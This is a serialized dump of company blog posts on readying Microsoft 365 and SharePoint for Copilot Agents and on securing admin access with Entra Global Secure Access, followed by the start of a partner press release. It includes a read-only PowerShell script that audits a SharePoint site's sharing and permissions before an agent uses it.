tenant boundaries. 
That means we get the same level of security for these applications that we already have.",[12,21464,21465],{},[2642,21466],{"alt":21467,"src":21468},"Diagram showing how Microsoft 365 Copilot accesses user data within Microsoft 365.","https://res.cloudinary.com/c4a8/image/upload/blog/pics/copilot-security.png",[12,21470,21471],{},"In addition, Microsoft offers several technical and organizational commitments, grouped under the name \"Enterprise Data Protection\".",[12,21473,21388,21474],{},[2672,21475,21099],{"href":21099,"rel":21476},[2676],[186,21478,21480],{"id":21479},"microsoft-365-copilot-enterprise-data-protection-edp-for-prompts-and-responses","Microsoft 365 Copilot: Enterprise Data Protection (EDP) for Prompts and Responses",[12,21482,47],{},[1254,21484,21485,21504,21510,21530,21536],{},[1257,21486,21487,21490,21491,2901,21494,21497,21498,2901,21501,1013],{},[251,21488,21489],{},"Contractual Protection",": Prompts (user input) and responses (Copilot output) are protected under the ",[251,21492,21493],{},"Data Protection Addendum (DPA)",[251,21495,21496],{},"Product Terms",". These protections are the same as those applied to ",[251,21499,21500],{},"emails in Exchange",[251,21502,21503],{},"files in SharePoint",[1257,21505,21506,21509],{},[251,21507,21508],{},"Data Security:"," Encryption at rest and in transit, physical security controls, tenant-level data isolation",[1257,21511,21512,21515,21516,21519,21520,805,21523,805,21526,21529],{},[251,21513,21514],{},"Privacy Commitments:"," Microsoft acts as a ",[251,21517,21518],{},"data processor",", using data only as instructed by the customer. 
Supports ",[251,21521,21522],{},"GDPR",[251,21524,21525],{},"EU Data Boundary",[251,21527,21528],{},"ISO/IEC 27018",", and more.",[1257,21531,21532,21535],{},[251,21533,21534],{},"Access Control & Policy Inheritance",": Copilot respects identity models and permissions, sensitivity labels, retention policies, audit settings and admin configurations. AI and copyright risk mitigation covers protection against prompt injection, harmful content and copyright issues (via protected material detection and the Customer Copyright Commitment)",[1257,21537,21538,21541],{},[251,21539,21540],{},"No Model Training:"," Prompts, responses, and Microsoft Graph data are NOT used to train foundation models.",[186,21543,21545],{"id":21544},"copilot-agents-with-sharepoint-online-knowledge","Copilot Agents with SharePoint Online Knowledge",[12,21547,47],{},[1254,21549,21550,21560],{},[1257,21551,21552,21555,21556,21559],{},[251,21553,21554],{},"Permission & Sharing Model:"," Agents with SharePoint Online access always respect the permissions of the associated SharePoint site. That means, ",[251,21557,21558],{},"on one hand, you need to ensure that everyone who should have access has at least read permissions on the site","; on the other hand, you must be vigilant about not granting unnecessary permissions that could expose sensitive information to unauthorized users. Properly configuring permissions is essential, as Copilot Agents will only be able to access and surface content that the querying user is permitted to see. Additionally, leveraging Microsoft Purview information protection ensures that sensitivity labels and data loss prevention (DLP) policies persist with the content.",[1257,21561,21562,21565,21566,21569],{},[251,21563,21564],{},"Persistent Labels & DLP:"," Enable ",[251,21567,21568],{},"Microsoft Purview"," information protection so that sensitivity labels persist with content. Copilot agents inherit labels on source documents. 
If a file is classified “Confidential”, content that Copilot generates from it carries that label forward. This persistent label inheritance works in tandem with Data Loss Prevention policies to prevent AI from inadvertently exposing protected data. In practice, that means that even if Copilot summarizes a sensitive file, the summary is handled as sensitive too. This level of integration with labels and DLP is currently unique to agents inside the Microsoft 365 ecosystem.",[41,21571,21573],{"id":21572},"best-practices-to-prepare-further-sharepoint-online-for-agent-use","Best Practices to Prepare SharePoint Online for Agent Use",[12,21575,31],{},[12,21577,21578],{},"To prepare SharePoint Online for effective use with Copilot Agents, follow these best practices:",[186,21580,21582],{"id":21581},"dedicated-sharepoint-site","Dedicated SharePoint Site",[12,21584,47],{},[12,21586,21587],{},"First, create a dedicated SharePoint site or a specific folder designed exclusively for your Copilot Agent’s knowledge base. This approach helps minimize issues related to oversharing and reduces the risk of users accidentally uploading sensitive or irrelevant files to the agent’s accessible repository. If you decide to use an existing SharePoint site, carefully review its contents to ensure that no confidential or sensitive information is stored there that should not be discoverable by the agent.",[186,21589,21591],{"id":21590},"granting-access","Granting Access",[12,21593,47],{},[12,21595,21596,21597,21600],{},"It is also important to ensure that all intended users have the necessary read permissions to access the site or folder. 
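The following script is an added example, not code from the original post. It performs the pre-flight check a practitioner wants before connecting an agent to a site, covering the dedicated-site advice above, the read-access requirement, and the permission-trimmed behaviour described in the SharePoint Online section: using the SharePoint Online Management Shell it reports whether sharing is enabled on the site, whether an ‘Everyone’ or ‘Everyone except external users’ claim would turn the site into tenant-wide knowledge, which groups hold write roles, and whether the intended reader security group sits in the Visitors group. The admin URL, site URL and group name are placeholders (assumptions), and the remediation cmdlet is only referenced in a comment.

```powershell
# Added example (not from the original post): pre-flight audit of a SharePoint site that
# is about to become a Copilot agent knowledge base. Needs the SharePoint Online
# Management Shell (Microsoft.Online.SharePoint.PowerShell) and a SharePoint admin role.
# The three values below are placeholders; replace them with your own.
param(
    [string]$AdminUrl    = 'https://contoso-admin.sharepoint.com',
    [string]$SiteUrl     = 'https://contoso.sharepoint.com/sites/AgentKnowledge',
    [string]$ReaderGroup = 'SG-Agent-Readers'   # Entra security group that should be able to read
)

Connect-SPOService -Url $AdminUrl
$findings = [System.Collections.Generic.List[string]]::new()

# 1. Sharing posture: a knowledge site should not be shareable with guests or anonymous links.
$site = Get-SPOSite -Identity $SiteUrl
if ($site.SharingCapability -ne 'Disabled') {
    $findings.Add(('SharingCapability is {0}; expected Disabled for an agent knowledge site' -f $site.SharingCapability))
}

# 2. Broad-access claims. The agent surfaces whatever the querying user can read, so an
#    'Everyone' (c:0(.s|true) or 'Everyone except external users' (spo-grid-all-users)
#    entry makes the whole site tenant-wide knowledge regardless of what the curators intended.
$broadClaims = @('c:0(.s|true', 'c:0-.f|rolemanager|spo-grid-all-users/*')
$groups = Get-SPOSiteGroup -Site $SiteUrl
foreach ($group in $groups) {
    foreach ($member in @($group.Users | Where-Object { $_ })) {
        foreach ($pattern in $broadClaims) {
            if ($member -like $pattern) {
                $findings.Add(('Group {0} (roles: {1}) contains broad claim {2}' -f $group.Title, ($group.Roles -join ','), $member))
            }
        }
    }
}

# 3. Write roles. Only curators should be able to change the knowledge; everyone else belongs
#    in Visitors (Read). Any populated group with a write-capable role is listed for review.
$writeRoles = @('Full Control', 'Design', 'Edit', 'Contribute')
foreach ($group in $groups) {
    $grantsWrite = @($group.Roles | Where-Object { $writeRoles -contains $_ })
    $memberCount = @($group.Users | Where-Object { $_ }).Count
    if ($grantsWrite.Count -gt 0 -and $memberCount -gt 0) {
        $findings.Add(('Group {0} grants {1} to {2} principal(s); confirm these are curators only' -f $group.Title, ($grantsWrite -join ','), $memberCount))
    }
}

# 4. Intended readers. The Users array holds claim strings, so resolve display names with
#    Get-SPOUser and look for the security group inside the Visitors group.
$visitors = $groups | Where-Object { $_.Title -like '*Visitors' } | Select-Object -First 1
if ($null -eq $visitors) {
    $findings.Add('No Visitors group found; read access must be granted some other way')
} else {
    $present = Get-SPOUser -Site $SiteUrl -Group $visitors.Title | Where-Object { $_.DisplayName -eq $ReaderGroup }
    if ($null -eq $present) {
        # Remediation: Add-SPOUser -Site $SiteUrl -Group $visitors.Title -LoginName <group login name>
        $findings.Add(('Security group {0} is not a member of {1}; intended users will get no answers from this site' -f $ReaderGroup, $visitors.Title))
    }
}

if ($findings.Count -eq 0) { 'No findings: site is ready for agent use' } else { $findings }
```

Run it with a SharePoint Administrator account before the agent is published; an empty result means the site grants read access to exactly the intended group, nothing broader, and cannot be shared outward, which is the state the permission-trimmed retrieval described above relies on.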
If you need to grant access manually, give all intended users read access to the site (for example, by ",[251,21598,21599],{},"adding them to the SharePoint site’s Visitors group"," or an appropriate Microsoft Entra ID (formerly Azure AD) security group) to simplify the process and prevent accidental permission misconfigurations.",[186,21602,21604],{"id":21603},"prepare-files","Prepare Files",[12,21606,47],{},[12,21608,21609,21610,21613,21614,21617],{},"When preparing documents for use with Copilot Agents, remember that the AI currently ",[251,21611,21612],{},"cannot interpret embedded images within"," files. ",[251,21615,21616],{},"Therefore, add descriptive image captions or alternative text"," to help ensure that important visual information is not lost. For text-heavy documents that Copilot will summarize or reference, keep the total to a maximum of 1.5 million words or 300 pages to ensure Copilot works effectively.",[12,21619,21620,21621,21624],{},"For ",[251,21622,21623],{},"Excel files",", organize your data so that each file focuses either on numbers or on text, as mixed-content tables tend to yield less accurate results. Agents also respond most reliably to queries when the relevant data is contained within a single sheet of the workbook.",[12,21626,21627],{},[3456,21628,21629],{},"Agents respond best to Excel data when it’s contained in one sheet.",[12,21631,21632],{},"Example: If you have a large customer feedback survey stored in a single Excel file, separate the quantitative data (such as ratings and numerical responses) from the qualitative data (such as free-text feedback) into two different sheets. 
This method allows you to use tools like Python and Excel formulas to efficiently analyze the numerical data (e.g., calculate averages, sort results, determine confidence levels), while leveraging M365 Copilot’s sentiment analysis features to gain insights from the text-based feedback.",[186,21634,21636],{"id":21635},"file-limitations","File Limitations",[12,21638,47],{},[12,21640,21641,21642],{},"Finally, be aware of the file types and size limits supported by Copilot Agents and Copilot Studio. The following table outlines current support:",[2672,21643,21393],{"href":21391,"rel":21644},[2676],[12,21646,21647,21648],{},"Also take into account the best practices Microsoft has shared on document length: ",[2672,21649,21650],{"href":21650,"rel":21651},"https://support.microsoft.com/en-gb/topic/keep-it-short-and-sweet-a-guide-on-the-length-of-documents-that-you-provide-to-copilot-66de2ffd-deb2-4f0c-8984-098316104389",[2676],[21653,21654],"v-table",{":head":3821,":hide-container":3821,":table":21655},"fileLimitations",[12,21657,21658],{},"Unsupported file types in SharePoint Online: any type not listed in the table above is officially unsupported.",[12,21660,21661],{},"Certain file types, such as CSV files, may function adequately even though they are not officially supported because they closely resemble plain text formats. However, most other file types—particularly container files like CAB, EXE, ZIP, as well as image, video, and audio formats such as PNG, IMG, MP3, and MP4—are not supported at this time.",[41,21663,21665],{"id":21664},"final-thoughts","Final thoughts",[12,21667,31],{},[12,21669,21670],{},"By following these recommendations, you can ensure that your Copilot Agents have access to well-structured, secure, and high-quality data, maximizing their usefulness and minimizing the risk of accidental data exposure. 
Investing time in preparing your SharePoint environment sets a strong foundation for successful AI agent deployment and adoption within your organization.",[12,21672,21673],{},"In fact many of our \"Build-an-Agent\" projects starting exactly with that. Not building the agent, but preparing the infrastructure and knowledge that we have a good quality data to use for the AI, because the Agent is only as good as the system beneath it!",{"title":65,"searchDepth":111,"depth":111,"links":21675},[21676,21677,21678,21691,21695,21701,21705,21711],{"id":8257,"depth":111,"text":8258},{"id":21055,"depth":111,"text":21056},{"id":21126,"depth":111,"text":21127,"children":21679},[21680,21681,21682,21683,21685,21686,21687,21688,21689,21690],{"id":21135,"depth":329,"text":21136},{"id":21144,"depth":329,"text":21145},{"id":21157,"depth":329,"text":21158},{"id":21174,"depth":329,"text":21684},"Step 4: Generate a SharePoint Online Baseline Report",{"id":21206,"depth":329,"text":21207},{"id":21215,"depth":329,"text":21216},{"id":21228,"depth":329,"text":21229},{"id":21237,"depth":329,"text":21238},{"id":21254,"depth":329,"text":21255},{"id":21263,"depth":329,"text":21264},{"id":21296,"depth":111,"text":21297,"children":21692},[21693,21694],{"id":21302,"depth":329,"text":21303},{"id":21334,"depth":329,"text":21335},{"id":21362,"depth":111,"text":21363,"children":21696},[21697,21698,21699,21700],{"id":21375,"depth":329,"text":21376},{"id":21396,"depth":329,"text":21397},{"id":21408,"depth":329,"text":21409},{"id":21427,"depth":329,"text":21428},{"id":21450,"depth":111,"text":21451,"children":21702},[21703,21704],{"id":21479,"depth":329,"text":21480},{"id":21544,"depth":329,"text":21545},{"id":21572,"depth":111,"text":21573,"children":21706},[21707,21708,21709,21710],{"id":21581,"depth":329,"text":21582},{"id":21590,"depth":329,"text":21591},{"id":21603,"depth":329,"text":21604},{"id":21635,"depth":329,"text":21636},{"id":21664,"depth":111,"text":21665},{"lang":2171,"seoTitle":21713,"title
Class":2173,"date":21714,"categories":21715,"blogtitlepic":21716,"socialimg":21717,"customExcerpt":21718,"keywords":21719,"maxContent":2181,"fileLimitations":21720,"textImageTeaser":21746,"asideNav":21757,"hreflang":21777,"footer":21782,"scripts":21783,"published":2181},"How to Prepare Your M365 Data for Copilot Agents","2025-08-28",[2810],"head-microsoft-copilot.jpg","/blog/heads/head-microsoft-copilot.jpg","Before Microsoft 365 Copilot Agents can deliver real value, the foundation must be solid: clean data, proper permissions, and a reliable infrastructure. This guide explains why data quality determines AI success, highlights risks like oversharing and silos, and outlines 10 practical steps to make your M365 environment agent-ready—secure, compliant, and scalable.","Microsoft 365 Copilot, Copilot Agents, M365 data governance, AI readiness, SharePoint data security, M365 infrastructure, oversharing prevention, AI data preparation, Microsoft 365 security, agent-ready M365",[21721,21725,21729,21732,21735,21737,21739,21741,21742,21744],[21722,21723,21724],"File type","SharePoint Online - Limit","Manual Upload - Limit",[21726,21727,21728],".doc","150 MB","100 MB",[21730,21731,21728],".docx","512 MB",[21733,21727,21734],".html","not supported",[21736,21731,21728],".pdf",[21738,21727,21728],".ppt",[21740,21731,21728],".pptx",[15305,21727,21728],[21743,21727,21728],".xls",[21745,21727,21728],".xlsx",{"image":21747,"cloudinary":2181,"alt":21748,"bgColor":21749,"offset":2181,"white":2181,"list":21750,"left":2168,"float":2168,"firstColWidth":650,"secondColWidth":662,"copyClasses":8128,"headline":21754,"subline":21755,"spacing":21756},"/icons/icon-copilot.svg","Copilot Icon","#543b9c",[21751],{"ctaText":21752,"ctaHref":21753,"ctaType":6003,"external":2181},"Secure your spot now – free of charge!","https://events.teams.microsoft.com/event/53a92e2c-9206-488d-9602-831864212207@a53834b7-42bc-46a3-b004-369735c3acf9","Agent-Ready Infrastructure – Your Foundation for Productive 
Copilot Agents","\u003Cp>AI is only as good as the infrastructure it runs on. If you want to use Copilot Agents seriously in practice, you need more than just licensing and activation. It’s all about structured data, consistent governance, and a well-thought-out architecture that scales—in short: an Agent-Ready Infrastructure.\u003Cbr /> \u003Cbr /> In our English-language session, you’ll learn:\u003C/p> \u003Cul> \u003Cli>Why data quality and information architecture are critical to success\u003C/li> \u003Cli>How to get your Microsoft 365 environment ready for productive agents\u003C/li> \u003Cli>And which levers you need to pull today so your company truly benefits from AI tomorrow\u003C/li> \u003C/ul> ","space-top-2 space-bottom-2 mt-10",{"menuItems":21758},[21759,21762,21765,21768,21771,21774],{"href":21760,"text":21761},"#why-your-infrastructure-data-matters","Why Infrastructure Matters",{"href":21763,"text":21764},"#_10-steps-to-improve-your-m365-data-infrastructure-now","10 Steps for M365 Data",{"href":21766,"text":21767},"#understanding-differences-between-agent-platforms","Understanding Agent Platform",{"href":21769,"text":21770},"#rag-retrieval-augumented-generation-vs-sharepoint-vs-upload","RAG vs. SharePoint vs. 
Upload",{"href":21772,"text":21773},"#microsoft-365-copilot-copilot-agents-security-compliance-out-of-the-box","M365 Copilot: Security",{"href":21775,"text":21776},"#best-practices-to-prepare-further-sharepoint-online-for-agent-use","SharePoint Best Practices",[21778,21780],{"lang":2260,"href":21779},"/de/posts/2025-08-26-agent-ready-infrastructure",{"lang":2263,"href":21781},"/es/posts/2025-08-26-agent-ready-infrastructure",{"noMargin":2181},{"slick":2181},"/posts/2025-08-28-agent-ready-infrastructure-copy",{"title":21032,"description":65},"posts/2025-08-28-agent-ready-infrastructure copy",[21788,21789,21790,21791],"Microsoft 365 Copilot","M365 Data Governance","SharePoint Security","AI Data Preparation","w57R3glic_nCG_VCxOCqp3hNggKDkLiX_lPqMU2a1Nk",{"id":21794,"title":21795,"author":21796,"body":21797,"cta":2166,"description":65,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":22009,"moment":2166,"navigation":2181,"path":22039,"seo":22040,"stem":22041,"tags":22042,"webcast":2168,"__hash__":22043},"content_en/posts/2025-09-25-gsa-unlocked.md","Global Secure Access Unlocked",[2373,2530],{"type":9,"value":21798,"toc":21995},[21799,21803,21805,21808,21811,21814,21818,21820,21823,21828,21831,21836,21839,21844,21848,21850,21853,21857,21859,21862,21865,21868,21871,21876,21880,21882,21885,21893,21898,21902,21904,21907,21910,21913,21918,21922,21924,21927,21930,21933,21938,21942,21944,21947,21950,21953,21961,21964,21969,21973,21975,21978,21981,21985,21987,21989,21992],[41,21800,21802],{"id":21801},"what-is-a-managed-red-tenant","What is a Managed Red Tenant?",[12,21804,31],{},[12,21806,21807],{},"The Managed Red Tenant combines our extensive experience in managed services with proven blueprints in the areas of workplace, Azure, and security.",[12,21809,21810],{},"The result: An isolated, fully cloud-based as-code managed environment that effectively protects administrative users and endpoints – even in target environments with multiple Microsoft 
Entra tenants and Active Directory domains.",[12,21812,21813],{},"Our solution relies on native, cloud-based identity and security features from Microsoft and strictly adheres to Zero Trust principles.",[186,21815,21817],{"id":21816},"global-secure-access-as-security-service-edge","Global Secure Access as Security Service Edge",[12,21819,47],{},[12,21821,21822],{},"We have integrated the latest innovations from Global Secure Access into various components of the Managed Red Tenant to enhance security when accessing Virtual Access Workstations (VAWs) and to protect and restrict outgoing privileged access.",[12,21824,21825],{},[251,21826,21827],{},"Microsoft Entra Internet Access",[12,21829,21830],{},"functioning as an identity-centric Secure Web Gateway (SWG), has been implemented to block public internet access and restrict connectivity to privileged interfaces and the authorized company’s tenant environments only. Additional features, such as Universal Conditional Access Evaluation (CAE), enable near real-time access blocking.",[12,21832,21833],{},[251,21834,21835],{},"Microsoft Entra Private Access",[12,21837,21838],{},"serves as an identity-centric Zero Trust Network Access (ZTNA) solution and is the core of our approach to providing secure and private access to VAWs. Its integration into our solution adds an extra layer of protection for privileged sessions on AVD-based endpoints by enforcing Conditional Access on the accessing client before establishing connectivity to the VAW. 
Securing access to private or on-premises resources under the same Zero Trust principles is another use case where we benefit from Private Access.",[12,21840,21841],{},[2642,21842],{"alt":7092,"src":21843},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/gsa-img-01.png",[41,21845,21847],{"id":21846},"use-cases-for-global-secure-access-in-the-managed-red-tenant","Use Cases for Global Secure Access in the Managed Red Tenant",[12,21849,31],{},[12,21851,21852],{},"Global Secure Access is one of the core components in the design of our Managed Red Tenant, and we’re excited to elevate both security and usability to a new level. The added value becomes most evident when looking at the individual use cases, which we’ll showcase in this blog.",[186,21854,21856],{"id":21855},"access-to-virtual-access-workstations","Access to Virtual Access Workstations",[12,21858,47],{},[12,21860,21861],{},"Some organizations choose not to equip all administrators with physical Privileged Admin Workstations (PAWs). For these low-privileged admins, we offer what we call Virtual Access Workstations (VAWs).",[12,21863,21864],{},"The most critical aspect here is secure access to the VAWs, and we consider it essential to establish a high level of security—where Entra Private Access plays a key role.",[12,21866,21867],{},"Administrators connect to the VAWs from their enterprise devices and sign in using their account from the Managed Red Tenant. Because of this identity switch, the accessing user is sourced from a different tenant than the original device and cannot present a device compliance status to the Managed Red Tenant.",[12,21869,21870],{},"Therefore, we use Global Secure Access to pre-authenticate the connection with the original (workforce) user and device before any traffic reaches the VAW. Since our VAWs do not expose public endpoints and are only accessible via Entra Private Access, we can secure network access to a very high degree. 
Conditional Access in the workforce environment enforces strong user and device authentication, including device compliance and risk-based controls.",[12,21872,21873],{},[2642,21874],{"alt":7092,"src":21875},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/gsa-img-02.png",[186,21877,21879],{"id":21878},"secure-web-filtering","Secure Web Filtering",[12,21881,47],{},[12,21883,21884],{},"A key characteristic of administrative devices is their strictly limited access to applications, designed to minimize the attack surface as much as possible. While local solutions such as proxy.pac files or shared centralized proxies (not T0 exclusive) were commonly used in the past, we’ve opted for Entra Internet Access for devices within the Managed Red Tenant.",[1254,21886,21887,21890],{},[1257,21888,21889],{},"Internet access is only permitted from compliant devices and after strong user authentication",[1257,21891,21892],{},"Access is restricted to explicitly approved URLs, and since HTTPS traffic (where possible) is decrypted and inspected, it’s also feasible to limit access to specific paths—for example, within Azure DevOps or GitHub",[12,21894,21895],{},[2642,21896],{"alt":7092,"src":21897},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/gsa-img-03.png",[186,21899,21901],{"id":21900},"tenant-restrictions-for-saas-services-and-administrative-interfaces","Tenant Restrictions for SaaS Services and Administrative Interfaces",[12,21903,47],{},[12,21905,21906],{},"In SaaS services and administrative interfaces, it’s common for URLs to be identical across all tenants, which makes them difficult to control using the web filtering methods described above.",[12,21908,21909],{},"To ensure that only accounts from the Managed Red Tenant can sign in to Microsoft’s approved portals from an administrative device, we leverage the Tenant Restriction feature of Global Secure Access.",[12,21911,21912],{},"Through Entra Internet Access, Entra ID is signaled which tenants are 
permitted for sign-in. This guarantees that all policies from the Managed Red Tenant are enforced and that administrative access occurs exclusively via B2B collaboration.",[12,21914,21915],{},[2642,21916],{"alt":7092,"src":21917},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/gsa-img-04.png",[186,21919,21921],{"id":21920},"on-premises-access","On-Premises Access",[12,21923,47],{},[12,21925,21926],{},"Of course, a Managed Red Tenant can also be used to administer on-premises and IaaS environments, which requires secure access to the datacenters. Entra Private Access provides us with Zero Trust Network Access that combines top-tier security standards with a flexible architecture and strong performance.",[12,21928,21929],{},"Access to datacenters and IaaS environments depends on robust user and device authentication, including device compliance and risk-based controls.",[12,21931,21932],{},"Managing individual targets as app segments enables granular access control, which is automated using Entra Governance features. 
This extends functions already widely used in the Managed Red Tenant—such as Just-In-Time administration and approval workflows—into the network layer.",[12,21934,21935],{},[2642,21936],{"alt":7092,"src":21937},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/gsa-img-05.png",[186,21939,21941],{"id":21940},"revocation-access-in-near-real-time","Access Revocation in Near Real-Time",[12,21943,47],{},[12,21945,21946],{},"Zero Trust also means being prepared to quickly and effectively contain threats—even within the most secure architecture—and to isolate compromised components.",[12,21948,21949],{},"In a Managed Red Tenant environment, we’re not only prepared for the compromise of users and devices within the tenant itself, but also for the more likely scenario where an attack originates from an admin’s office PC and then propagates to the Virtual Access Workstation (VAW).",[12,21951,21952],{},"Thanks to the Universal Continuous Access Evaluation (CAE) feature in Global Secure Access, the following actions are triggered automatically:",[1254,21954,21955,21958],{},[1257,21956,21957],{},"Access to the VAW via Entra Private Access is interrupted if, for example, the user risk level of the account in the workforce tenant is set to High",[1257,21959,21960],{},"Access to admin interfaces and the datacenter environment is revoked if, for example, the sessions of the account in the Managed Red Tenant are terminated",[12,21962,21963],{},"Additionally, full isolation of all devices and accounts within the Managed Red Tenant can be initiated at any time by the integrated CSOC service.",[12,21965,21966],{},[2642,21967],{"alt":7092,"src":21968},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/gsa-img-06.png",[186,21970,21972],{"id":21971},"enriched-sign-ins-and-token-insights","Enriched Sign-Ins and Token Insights",[12,21974,47],{},[12,21976,21977],{},"Beyond its many features for access control, Global Secure Access is a true game changer when it 
comes to logging. We gain significantly more telemetry from the network layer and can correlate it with existing sign-in and audit logs.",[12,21979,21980],{},"This enables our CSOC to identify which actions were still performed after containment was triggered—for example, in cases where not all tokens supported Continuous Access Evaluation (CAE).",[12,21982,21983],{},[2642,21984],{"alt":7092,"src":21968},[41,21986,21665],{"id":21664},[12,21988,31],{},[12,21990,21991],{},"This blog is published alongside a webcast where we explore the Managed Red Tenant, Global Secure Access, the integration process, and the relevant use cases, supported by live demos.",[12,21993,21994],{},"If this blog has sparked your interest, we definitely encourage you to check out the webcast. And of course, we’re always happy to hear from you directly!",{"title":65,"searchDepth":111,"depth":111,"links":21996},[21997,22000,22008],{"id":21801,"depth":111,"text":21802,"children":21998},[21999],{"id":21816,"depth":329,"text":21817},{"id":21846,"depth":111,"text":21847,"children":22001},[22002,22003,22004,22005,22006,22007],{"id":21855,"depth":329,"text":21856},{"id":21878,"depth":329,"text":21879},{"id":21900,"depth":329,"text":21901},{"id":21920,"depth":329,"text":21921},{"id":21940,"depth":329,"text":21941},{"id":21971,"depth":329,"text":21972},{"id":21664,"depth":111,"text":21665},{"lang":2171,"seoTitle":22010,"titleClass":2173,"date":22011,"categories":22012,"blogtitlepic":22013,"socialimg":22014,"customExcerpt":22015,"keywords":22016,"maxContent":2181,"textImageTeaser":22017,"asideNav":22026,"hreflang":22034,"footer":22037,"scripts":22038,"published":2181},"Securing Microsoft 365 Admin Access with Entra and Global Secure Access","2025-09-25",[2176],"head-gsa-unlocked.jpg","/blog/heads/head-gsa-unlocked.jpg","This blog explores how Microsoft Global Secure Access enhances security and control in our Managed Red Tenant. 
With Entra Internet Access and Private Access, organizations can secure admin sessions, enforce Zero Trust, and streamline access to cloud and on-prem resources. Real-world use cases and architecture insights show how to protect M365 environments effectively.","Microsoft Global Secure Access, Entra Internet Access, Entra Private Access, Managed Red Tenant, Zero Trust, M365 security, conditional access, admin access control, secure web filtering, virtual admin workstations, CAE, tenant restrictions, Microsoft 365, cloud security",{"image":22018,"cloudinary":2181,"alt":21748,"bgColor":22019,"offset":2181,"white":2181,"list":22020,"left":2168,"float":2168,"firstColWidth":650,"secondColWidth":662,"copyClasses":8128,"headline":22024,"subline":22025,"spacing":21756},"/icons/shape-managed-red-tenant.svg","#E44418",[22021],{"ctaText":22022,"ctaHref":22023,"ctaType":6003,"external":2181},"Watch the full session on YouTube","https://youtu.be/SpEOIdoA-uc","Global Secure Access Unlocked: Real World Implementation in Managed Red Tenant","\u003Cp>In the Managed Red Tenant, we enforce strict separation for privileged access. 
Live demos will show how we secure admin workflows using Global Secure Access.\u003Cbr /> \u003Cbr /> In our English-language session, you’ll learn:\u003C/p> \u003Cul> \u003Cli>How PAWs and VAWs with identity switching create secure admin workstations\u003C/li> \u003Cli>How Tenant Restrictions and Cross-Tenant Access Policies allow only authorized access\u003C/li> \u003Cli>How Per-App Tunnels and Continuous Access Evaluation are replacing traditional VPNs\u003C/li> \u003Cli>How Just-in-Time administration works in practice with Microsoft PIM\u003C/li> \u003C/ul> ",{"menuItems":22027},[22028,22030,22032],{"href":22029,"text":21802},"#what-is-a-managed-red-tenant",{"href":22031,"text":21847},"#use-cases-for-global-secure-access-in-the-managed-red-tenant",{"href":22033,"text":21665},"#final-thoughts",[22035,22036],{"lang":2260,"href":21779},{"lang":2263,"href":21781},{"noMargin":2181},{"slick":2181},"/posts/2025-09-25-gsa-unlocked",{"title":21795,"description":65},"posts/2025-09-25-gsa-unlocked",[21788,21789,21790,21791,6236],"fa9cSgWNIC3cl6ZixVtMGvI-KMd_q6EyoL3Sm6gH2hE",{"id":22045,"title":22046,"author":22047,"body":22048,"cta":2166,"description":65,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":22149,"moment":2166,"navigation":2181,"path":22190,"seo":22191,"stem":22192,"tags":22193,"webcast":2168,"__hash__":22197},"content_en/posts/2025-09-30-security-store.md","First Worldwide: glueckkanja Security Copilot Agents",[2461],{"type":9,"value":22049,"toc":22144},[22050,22054,22056,22059,22061,22064,22067,22070,22073,22077,22084,22086,22096,22107,22126,22137],[41,22051,22053],{"id":22052},"at-the-launch-of-the-microsoft-security-store-glueckkanja-introduced-10-security-copilot-agents","At the launch of the Microsoft Security Store, glueckkanja introduced 10 Security Copilot Agents",[12,22055,31],{},[12,22057,22058],{},"Offenbach, Germany – September 30, 2025 – glueckkanja today announced its inclusion in the Microsoft Security Store Partner 
Ecosystem. As one of the very first partners, glueckkanja was selected based on their proven experience with Microsoft Security technologies, willingness to explore and provide feedback on cutting edge functionality, and close relationship with Microsoft.",[5082,22060],{":quotes":5082,":no-fullscreen":3821},[52,22062],{"style":22063},"padding-top:50px;",[12,22065,22066],{},"glueckkanja is collaborating with Microsoft to help shape the development of the Microsoft Security Store, providing feedback on new features, integration experiences, and customer needs. By publishing certified solutions and AI agents that integrate seamlessly with Microsoft Security products, glueckkanja is making it easier for organizations to discover, purchase, and deploy trusted security technologies. Through the Security Store, glueckkanja is helping customers accelerate their security outcomes and simplify operations with solutions that are vetted, easy to deploy, and designed to work together.",[12,22068,22069],{},"The Microsoft Security Store simplifies how organizations discover, purchase, and deploy trusted solutions and AI agents. With certified integrations, simplified billing, and accelerated deployment, the Security Store helps defenders improve their security posture while focusing on what matters most.",[12,22071,22072],{},"The Microsoft Security Store is setting a new benchmark for cybersecurity procurement and deployment. By centralizing a wide range of security solutions and AI agents organizations can now streamline how they discover, acquire, and operationalize advanced security technologies. 
With features like industry framework alignment, simplified billing, and guided deployment, the Security Store helps security teams reduce complexity, accelerate adoption, and maximize the value of their security investment.",[41,22074,22076],{"id":22075},"learn-more-in-the-official-microsoft-blog","Learn more in the official Microsoft blog:",[12,22078,22079],{},[2672,22080,22083],{"href":22081,"rel":22082},"https://techcommunity.microsoft.com/blog/securitycopilotblog/agentic-security-your-way-build-your-own-security-copilot-agents/4454555",[2676],"Agentic Security Your Way: Build Your Own Security Copilot Agents",[41,22085,4982],{"id":4981},[12,22087,22088,22091,22092,22095],{},[251,22089,22090],{},"We Manage and Protect Microsoft Ecosystems at Scale","\nglueckkanja is a leading cloud managed service provider and top Microsoft partner, delivering secure, scalable, and fully ",[251,22093,22094],{},"cloud-native Microsoft environments."," With a unified blueprint approach and Infrastructure-as-Code methodology, glueckkanja enables enterprise customers to accelerate their digital transformation and cloud adoption. Securely, consistently, and at scale.",[12,22097,22098,22099,22102,22103,22106],{},"The company offers comprehensive managed services for ",[251,22100,22101],{},"Microsoft Azure, Microsoft Entra, and Microsoft Intune,"," helping organizations streamline identity and access management, modernize endpoint operations, and build compliant, Zero Trust-based infrastructures. 
